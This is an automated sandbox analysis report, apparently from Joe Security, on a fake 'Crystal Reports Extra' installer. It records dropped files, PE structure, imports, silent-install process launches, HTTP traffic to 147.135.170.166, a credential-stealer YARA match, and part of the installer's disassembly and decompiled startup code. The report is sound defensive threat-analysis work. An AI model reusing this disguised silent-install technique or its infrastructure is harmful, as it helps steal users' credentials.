                                                          SHA1:CC63FE7D78A3B6F3AEDEB43B061B954A0B4267F5
                                                          SHA-256:A3806CAAF1BA12893A9D85C8CF12D2E890145A13A34848FFD0107C2128C7D058
                                                          SHA-512:0985102FCAEA29ACD4754F15029222DFF44B60C189EC740C97464E625BE6788D2B461E1308429E14EB768CA0DEF807FD6A2AC85BBF29DCA2822AEF5E96E84223
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Short Words.MY.ON.AGE.AID.ALL.AND.ANT.ASK.ART.AWE.AXE.BAD.BAG.BAR.BEE.BEG.BET.BID.BIN.BIT.BOO.BOW.BOY.BRO.BUG.BUM.BUS.BUY.BYE.CAM.CAN.CAP.CAR.CAT.CAY.COP.COW.CRY.CUT.DOG.DIG.DIP.DRY.DYE.EAR.EAT.EEL.EEG.ELF.END.EON.ERA.EYE.FAD.FAN.FEW.FIG.FIN.FIT.FIX.FOR.FRY.FUN.FUR.HAD.HAM.HAT.HEN.HER.HIM.HOD.HOG.HOP.HUB.HUN.ILL.INN.LAP.LAY.LEG.MAD.MAN.MAP.MAT.MOM.MOP.MUD.MUG.NAP.NOD.NOW.NUN.NUT.OAK.ODD.OFF.OIL.ONE.OUR.OWL.OWN.PAY.PIG.PAW.PEN.PET.POP.RAT.RAW.RAY.RED.RID.RIM.RIP.ROD.RUN.SAD.SAW.SAY.SEE.SKY.SLY.TAP.TEA.THE.TIN.TIP.TOO.TOP.TOY.TRY.TWO.TYE.VET.WAR.WET.WHO.WHY.WIN.WON.YES.ZIP.ZOO.ABLE.ACHE.ACID.BAIT.BAKE.BAND.BATH.BULL.CAMP.CAPE.CARE.COIN.COST.DARE.DART.DEBT.DOLL.DOOM.DOOR.EASY.EPIC.ETCH.EVIL.EXIT.FACT.FADE.FEED.FILL.FISH.FOIL.FOND.FREE.FUSS.GLAD.GULP.HELP.KEEP.KIND.LAND.LEAD.LINE.MEAN.MIND.MOVE.NEWS.PINE.PLOT.QUIT.SAND.SEEM.SELL.SEND.SIGN.SOON.STAR.TALL.TIME.VIEW.YELL.ZOOM.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\words2.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1444
                                                          Entropy (8bit):4.247765748971925
                                                          Encrypted:false
                                                          SSDEEP:24:8g8muteQTW5d+ew52s0UjH/CpIdTrhhI+amefWxNc1xTiF9HKOkdsaHFrQDeqZRO:8g/FQTW574xjH/gIVV6mmuQToKeDtU
                                                          MD5:D34724B8D9935413FE501F71BFC63EED
                                                          SHA1:8BAD3BE97B83A2B5671C42C1912A5ACB57357102
                                                          SHA-256:A2ACA8E9D7E56D37DDBF127C863B40D11C9DB4A7A59347936C8448E2EC87CE13
                                                          SHA-512:C852F5547B6C944E28098EADE430D18C496A80C695D8A4ADF2BA22BE8D8C14F959335B585EFC9EE8A84DEB9F8293432BF52C71A3F98C6DE305A2984D66CDBBC1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Medium Words.ACID.ADULT.AGENT.AHEAD.ALARM.ANGEL.ARMY.BADLY.BASE.BASES.BEAST.BEGIN.BITE.BLACK.BLANK.BLESS.BLUE.BREAK.BUDGET.BULL.BUOY.BURY.CAGE.CELLO.CHAOS.CHEAT.CLEAN.CLEAR.CLOCK.CLOSE.CLOWN.COBRA.CODER.COULD.COURT.CREEP.CREW.CROSS.DANDY.DAWN.DECAY.DECOY.DEMON.DINER.DISC.DISCO.DISK.DIVA.DIVE.DIVER.DONKEY.DREAD.DRIED.DRIER.DRINK.DUCK.DWELL.EAST.EQUAL.ERROR.ESSAY.EXAM.FACT.FAKE.FAKIR.FAMILY.FETCH.FIGHT.FLAME.FLAT.FLOAT.FLOOD.FLOOR.FLUTE.FOOD.FRUIT.FUN.GEESE.GENE.GHOST.GLORY.GLOVE.GLOW.GLUE.GNOME.GOAL.GOAT.GOLD.GOOSE.GRADE.GRASS.GRAVE.GRAY.GRAZE.GREEN.GREET.GRIND.GROW.HALF.HALL.HARD.HAWK.HAZY.HITCH.HOBBY.HONEY.HOOK.HORSE.HOTEL.HUMOR.ICON.IDEAL.IDLE.IDOL.INCOME.INVERT.IRON.IRONY.JACKET.JOKE.JULY.KEEN.KILT.LAWYER.LAZY.LEECH.LICK.LIFE.LIGHT.LIKE.LIVE.LOBBY.LUNCH.LURE.LYNX.MANLY.MAYBE.MEDAL.MERCY.MILK.MILKY.MINOR.MOAT.MODEL.MOOSE.MORE.MOUSE.MOVIE.NAME.NASTY.NOBLE.NORTH.NOVICE.ONLY.OPEN.PAPER.PEARL.PEEL.PEER.PHONE.PIKE.PINK.PLANK.PLANT.POLICE.POST.PUSS.QUELL.QUEST.QUIET.QUOTE.RASH.REACH.READY.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\words\words3.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):1799
                                                          Entropy (8bit):4.2349912514036845
                                                          Encrypted:false
                                                          SSDEEP:48:/wI/M3lxB6KAk7Ft58tROSaSmcpioeqfUAE/S:/NqBGkJt58tcdAbeqfUp/S
                                                          MD5:926FA7D82A70961D83C7B9DC051EE7B8
                                                          SHA1:D21672084C88F203F26D1F53E7DC952876CC1D35
                                                          SHA-256:FAFD9879344108A0A5196DF58B643F97AD1B07B2BDEEE54706FDF37022D79F09
                                                          SHA-512:8D97D5077CDA870605EA24639A68AA43E6CDBB1E70538A37D6C1ED68171FAC6E9E0F140B3C75D2AB66AA93CF1440C46E4331D6ADAB4D157EB0BD3CC547D3D4B9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Long Words.ACTOR.ADAPTER.ADVANCE.ADVENT.AGENCY.AGENDA.AHEAD.AIRSHIP.ALARM.ALLIES.ALPHABET.AMATEUR.AMAZED.ANARCHY.ANCHOR.ANGEL.ANTENNA.ANTIQUE.APPRIZE.ASTRAL.ATTITUDE.AUREUS.AVATAR.BALLOON.BATTERY.BECKON.BECOME.BEETLE.BEFORE.BEGINS.BEHALF.BEHAVE.BEHIND.BEHOLD.BEING.BELIEF.BELONG.BESIDE.BETTER.BEYOND.BLESS.BOREDOM.BOUGHT.BUDGET.CANVAS.CAPTAIN.CARCASS.CENTURY.CHAOS.CHAOTIC.CHEAT.CHEMIST.CHIMERA.CHURCH.CLASP.CLOCK.CLONING.COLONEL.COMMON.COMPANY.CONFIRM.COUNCIL.COURT.CREDIT.CROSSED.CURRANT.DECOY.DEDUCE.DEFENSE.DEGREE.DEMON.DESIRE.DESSERT.DEVELOP.DEVOUR.DIMMER.DINGER.DISBAND.DISCORD.DISMAY.DIVORCE.DONKEY.DRAGON.DREAMER.DROID.DROOL.EARLIER.EATING.ECOTYPE.ELEGANT.EMPIRE.ENZYME.EPILOGUE.ERROR.ETHICS.EXPORT.EXPRESS.EXTRACT.FAKIR.FAMILY.FEUDAL.FIANCEE.FLAME.FLOAT.FLOOR.FOOLISH.FOREARM.FOSSIL.FOUGHT.FRIGATE.FRILL.FUN.GABBLE.GALLON.GARAGE.GHOST.GLASS.GLIDING.GRAPHIC.GRAVE.GREAT.GREEN.GRUMBLE.HARMONY.HAUNTED.HIGHER.HIGHWIRE.HUMORIST.HUNGRY.HUNTED.HUNTER.IDEAL.IMMORTAL.IMPLORE.INCOME.INSULT.INVERT.IS
                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Crystal Reports Extra\Crystal Reports Extra.lnk
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Sep 28 15:31:55 2021, mtime=Tue Sep 28 15:31:56 2021, atime=Tue Sep 28 04:12:46 2021, length=4910592, window=hide
                                                          Category:dropped
                                                          Size (bytes):1089
                                                          Entropy (8bit):4.860523030428847
                                                          Encrypted:false
                                                          SSDEEP:24:8m5IgeI6ooq0/0oR9wAYpuCokcOtlo7bkJm:8mugeI9l0/0o7HYbokF/o7bkJ
                                                          MD5:77E4D575654C3C60F692CAC036FB4C60
                                                          SHA1:A991C99BF1BD6D93C48D924BF87633D6A1CE4DDE
                                                          SHA-256:803BF35255351B672E11B8CEFD92510FAF136BD75894717A7FEFA9A6C1064B07
                                                          SHA-512:48F9C7B159E7226AF0C41D39197124A6B22CE7B1CFB31A75FBDE2F05FBDF03EC51DCE639E80E13F1E03E92BBAA0BE7FC910CA1A5BFBEEB260D7A13D5BFA10FEF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: L..................F.... ...&.Y......(Z.....[&y'.....J.......................:..DG..Yr?.D..U..k0.&...&...........-....DP.....W.Z........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny.<S......Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny.<S......Y....................D1,.R.o.a.m.i.n.g.....t.1.....<S....CRYSTA~1..\......<S..<S......"}........................C.r.y.s.t.a.l. .R.e.p.o.r.t.s. .E.x.t.r.a.....r.2...J.<S.) .CRYSTA~1.EXE..V......<S..<S......>}........................C.r.y.s.t.a.l.R.e.p.o.r.t.s...e.x.e.......v...............-.......u............U......C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe..7.....\.....\.....\.....\.....\.C.r.y.s.t.a.l. .R.e.p.o.r.t.s. .E.x.t.r.a.\.C.r.y.s.t.a.l.R.e.p.o.r.t.s...e.x.e.4.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.C.r.y.s.t.a.l. .R.e.p.o.r.t.s. .E.x.t.r.a.`.......X.......302494...........!a..%.H.VZAj...'..M..........-..!a..%.H.VZAj...

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.896187341178987
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 98.04%
                                                          • Inno Setup installer (109748/4) 1.08%
                                                          • InstallShield setup (43055/19) 0.42%
                                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                          File name:br4Cu3BycW.exe
                                                          File size:5124457
                                                          MD5:ec72a93f6279b16006f2196f330166ee
                                                          SHA1:74b4d4a19500d3644a6a4f523ad7d4adcb1ace6f
                                                          SHA256:4340bc1e1ddb5d268a010401be96435063de733a2601d158d13f56da9f20df5d
                                                          SHA512:3c0b595d905e8d6f83b82d769415bc257eaf514832575674179720b8486dccd5df24c0ff9a789498f76c388bfc5048fa56c0569d2342277c159262ca58ecf0ad
                                                          SSDEEP:98304:8SiwHhbbp/qa7irrDRcLAs6EOZ354tnteHOBQNnPcMa:Np/qRv9qAzEPttRmcd
                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                          File Icon

                                                          Icon Hash:5030d06cecec80aa

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4b5eec
                                                          Entrypoint Section:.itext
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x60B88E27 [Thu Jun 3 08:09:11 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:6
                                                          OS Version Minor:1
                                                          File Version Major:6
                                                          File Version Minor:1
                                                          Subsystem Version Major:6
                                                          Subsystem Version Minor:1
                                                          Import Hash:5a594319a0d69dbc452e748bcf05892e

                                                          Entrypoint Preview

                                                          Instruction
                                                          push ebp
                                                          mov ebp, esp
                                                          add esp, FFFFFFA4h
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          xor eax, eax
                                                          mov dword ptr [ebp-3Ch], eax
                                                          mov dword ptr [ebp-40h], eax
                                                          mov dword ptr [ebp-5Ch], eax
                                                          mov dword ptr [ebp-30h], eax
                                                          mov dword ptr [ebp-38h], eax
                                                          mov dword ptr [ebp-34h], eax
                                                          mov dword ptr [ebp-2Ch], eax
                                                          mov dword ptr [ebp-28h], eax
                                                          mov dword ptr [ebp-14h], eax
                                                          mov eax, 004B10F0h
                                                          call 00007F760498B055h
                                                          xor eax, eax
                                                          push ebp
                                                          push 004B65E2h
                                                          push dword ptr fs:[eax]
                                                          mov dword ptr fs:[eax], esp
                                                          xor edx, edx
                                                          push ebp
                                                          push 004B659Eh
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          mov eax, dword ptr [004BE634h]
                                                          call 00007F7604A2D77Fh
                                                          call 00007F7604A2D2D2h
                                                          lea edx, dword ptr [ebp-14h]
                                                          xor eax, eax
                                                          call 00007F76049A0AC8h
                                                          mov edx, dword ptr [ebp-14h]
                                                          mov eax, 004C1D84h
                                                          call 00007F7604985C47h
                                                          push 00000002h
                                                          push 00000000h
                                                          push 00000001h
                                                          mov ecx, dword ptr [004C1D84h]
                                                          mov dl, 01h
                                                          mov eax, dword ptr [004237A4h]
                                                          call 00007F76049A1B2Fh
                                                          mov dword ptr [004C1D88h], eax
                                                          xor edx, edx
                                                          push ebp
                                                          push 004B654Ah
                                                          push dword ptr fs:[edx]
                                                          mov dword ptr fs:[edx], esp
                                                          call 00007F7604A2D807h
                                                          mov dword ptr [004C1D90h], eax
                                                          mov eax, dword ptr [004C1D90h]
                                                          cmp dword ptr [eax+0Ch], 01h
                                                          jne 00007F7604A33DEAh
                                                          mov eax, dword ptr [004C1D90h]
                                                          mov edx, 00000028h
                                                          call 00007F76049A2424h
                                                          mov edx, dword ptr [004C1D90h]

                                                          Data Directories

                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0xc4000 | 0x9a | .edata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc2000 | 0xf36 | .idata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x10e00 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0xc6000 | 0x18 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0xc22e4 | 0x244 | .idata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xc3000 | 0x1a4 | .didata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                          Sections

                                                          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x1000 | 0xb361c | 0xb3800 | False | 0.344863934105 | data | 6.35605820433 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .itext | 0xb5000 | 0x1688 | 0x1800 | False | 0.544921875 | data | 5.97275005522 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                          .data | 0xb7000 | 0x37a4 | 0x3800 | False | 0.360979352679 | data | 5.04440056201 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .bss | 0xbb000 | 0x6de8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .idata | 0xc2000 | 0xf36 | 0x1000 | False | 0.3681640625 | data | 4.89870464796 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .didata | 0xc3000 | 0x1a4 | 0x200 | False | 0.345703125 | data | 2.75636286825 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .edata | 0xc4000 | 0x9a | 0x200 | False | 0.2578125 | data | 1.87222286659 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .tls | 0xc5000 | 0x18 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                          .rdata | 0xc6000 | 0x5d | 0x200 | False | 0.189453125 | data | 1.38389437522 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc | 0xc7000 | 0x10e00 | 0x10e00 | False | 0.188628472222 | data | 3.71218064983 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          Name | RVA | Size | Type | Language | Country
                                                          RT_ICON | 0xc7678 | 0xa68 | dBase IV DBT of \200.DBF, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0 | English | United States
                                                          RT_ICON | 0xc80e0 | 0x668 | data | English | United States
                                                          RT_ICON | 0xc8748 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0 | English | United States
                                                          RT_ICON | 0xc8a30 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                                                          RT_ICON | 0xc8b58 | 0x1628 | dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 0, next used block 101056512 | English | United States
                                                          RT_ICON | 0xca180 | 0xea8 | data | English | United States
                                                          RT_ICON | 0xcb028 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                                                          RT_ICON | 0xcb8d0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                                                          RT_ICON | 0xcbe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                                          RT_ICON | 0xcd120 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4244635647, next used block 4294967295 | English | United States
                                                          RT_ICON | 0xd1348 | 0x25a8 | data | English | United States
                                                          RT_ICON | 0xd38f0 | 0x10a8 | data | English | United States
                                                          RT_ICON | 0xd4998 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                          RT_STRING | 0xd4e00 | 0x360 | data | |
                                                          RT_STRING | 0xd5160 | 0x260 | data | |
                                                          RT_STRING | 0xd53c0 | 0x45c | data | |
                                                          RT_STRING | 0xd581c | 0x40c | data | |
                                                          RT_STRING | 0xd5c28 | 0x2d4 | data | |
                                                          RT_STRING | 0xd5efc | 0xb8 | data | |
                                                          RT_STRING | 0xd5fb4 | 0x9c | data | |
                                                          RT_STRING | 0xd6050 | 0x374 | data | |
                                                          RT_STRING | 0xd63c4 | 0x398 | data | |
                                                          RT_STRING | 0xd675c | 0x368 | data | |
                                                          RT_STRING | 0xd6ac4 | 0x2a4 | data | |
                                                          RT_RCDATA | 0xd6d68 | 0x10 | data | |
                                                          RT_RCDATA | 0xd6d78 | 0x2c4 | data | |
                                                          RT_RCDATA | 0xd703c | 0x2c | data | |
                                                          RT_GROUP_ICON | 0xd7068 | 0xbc | data | English | United States
                                                          RT_VERSION | 0xd7124 | 0x584 | data | English | United States
                                                          RT_MANIFEST | 0xd76a8 | 0x726 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States

                                                          Imports

                                                          DLL | Import
                                                          kernel32.dll | GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                          comctl32.dll | InitCommonControls
                                                          version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                          user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                          oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                          netapi32.dll | NetWkstaGetInfo, NetApiBufferFree
                                                          advapi32.dll | RegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                                                          Exports

                                                          Name | Ordinal | Address
                                                          TMethodImplementationIntercept | 3 | 0x454060
                                                          __dbk_fcall_wrapper | 2 | 0x40d0a0
                                                          dbkFCallWrapperAddr | 1 | 0x4be63c

                                                          Version Infos

                                                          Description | Data
                                                          LegalCopyright |
                                                          FileVersion | 1.8.3.7
                                                          CompanyName | XiliumHQ
                                                          Comments | This installation was built with Inno Setup.
                                                          ProductName | Crystal Reports Extra
                                                          ProductVersion | 1.8.3.7
                                                          FileDescription | Crystal Reports Extra Setup
                                                          OriginalFileName |
                                                          Translation | 0x0000 0x04b0

                                                          Possible Origin

                                                          Language of compilation system | Country where language is spoken | Map
                                                          English | United States |

                                                          Network Behavior

                                                          Network Port Distribution

                                                          TCP Packets

                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Sep 28, 2021 09:32:03.917289972 CEST | 49750 | 80 | 192.168.2.3 | 147.135.170.166
                                                          Sep 28, 2021 09:32:06.927512884 CEST | 49750 | 80 | 192.168.2.3 | 147.135.170.166
                                                          Sep 28, 2021 09:32:12.936220884 CEST | 49750 | 80 | 192.168.2.3 | 147.135.170.166

                                                          UDP Packets


                                                          System Behavior

                                                          General

                                                          Start time: 09:31:48
                                                          Start date: 28/09/2021
                                                          Path: C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\Desktop\br4Cu3BycW.exe'
                                                          Imagebase: 0x400000
                                                          File size: 5124457 bytes
                                                          MD5 hash: EC72A93F6279B16006F2196F330166EE
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: Borland Delphi
                                                          Reputation: low

                                                          General

                                                          Start time: 09:31:50
                                                          Start date: 28/09/2021
                                                          Path: C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp' /SL5='$302CC,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe'
                                                          Imagebase: 0x400000
                                                          File size: 3194368 bytes
                                                          MD5 hash: EEB69F7B86959AE72B9D37443FB7F3D0
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: Borland Delphi
                                                          Reputation: low

                                                          General

                                                          Start time: 09:31:51
                                                          Start date: 28/09/2021
                                                          Path: C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
                                                          Imagebase: 0x400000
                                                          File size: 5124457 bytes
                                                          MD5 hash: EC72A93F6279B16006F2196F330166EE
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: Borland Delphi
                                                          Reputation: low

                                                          General

                                                          Start time: 09:31:53
                                                          Start date: 28/09/2021
                                                          Path: C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp' /SL5='$120262,4283547,831488,C:\Users\user\Desktop\br4Cu3BycW.exe' /VERYSILENT
                                                          Imagebase: 0x400000
                                                          File size: 3194368 bytes
                                                          MD5 hash: EEB69F7B86959AE72B9D37443FB7F3D0
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: Borland Delphi
                                                          Reputation: low

                                                          General

                                                          Start time: 09:31:58
                                                          Start date: 28/09/2021
                                                          Path: C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe'
                                                          Imagebase: 0x400000
                                                          File size: 4910592 bytes
                                                          MD5 hash: 11DD538F1BF5F174834DBA334964A691
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.562826054.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation: low

                                                          Disassembly

                                                          Code Analysis

                                                            Executed Functions

                                                            C-Code - Quality: 73%
                                                            			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				char _v60;
                                                            				long _t39;
                                                            				_Unknown_base(*)()* _t42;
                                                            				_Unknown_base(*)()* _t43;
                                                            				_Unknown_base(*)()* _t46;
                                                            				signed int _t51;
                                                            				void* _t111;
                                                            				void* _t112;
                                                            				intOrPtr _t129;
                                                            				struct HINSTANCE__* _t148;
                                                            				intOrPtr* _t150;
                                                            				intOrPtr _t152;
                                                            				intOrPtr _t153;
                                                            
                                                            				_t152 = _t153;
                                                            				_t112 = 7;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t112 = _t112 - 1;
                                                            				} while (_t112 != 0);
                                                            				_push(_t152);
                                                            				_push(0x4b5388);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t153;
                                                            				 *0x4be664 =  *0x4be664 - 1;
                                                            				if( *0x4be664 >= 0) {
                                                            					L19:
                                                            					_pop(_t129);
                                                            					 *[fs:eax] = _t129;
                                                            					_push(0x4b538f);
                                                            					return E00407A80( &_v60, 0xe);
                                                            				} else {
                                                            					_t148 = GetModuleHandleW(L"kernel32.dll");
                                                            					_t39 = GetVersion();
                                                            					_t111 = 0;
                                                            					if(_t39 != 0x600) {
                                                            						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
                                                            						if(_t150 != 0) {
                                                            							 *_t150(0x800);
                                                            							asm("sbb ebx, ebx");
                                                            							_t111 = 1;
                                                            						}
                                                            					}
                                                            					if(_t111 == 0) {
                                                            						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
                                                            						if(_t46 != 0) {
                                                            							 *_t46(0x4b53e4);
                                                            						}
                                                            						E0040E520( &_v8);
                                                            						E00407E00(0x4be668, _v8);
                                                            						if( *0x4be668 != 0) {
                                                            							_t51 =  *0x4be668;
                                                            							if(_t51 != 0) {
                                                            								_t51 =  *(_t51 - 4);
                                                            							}
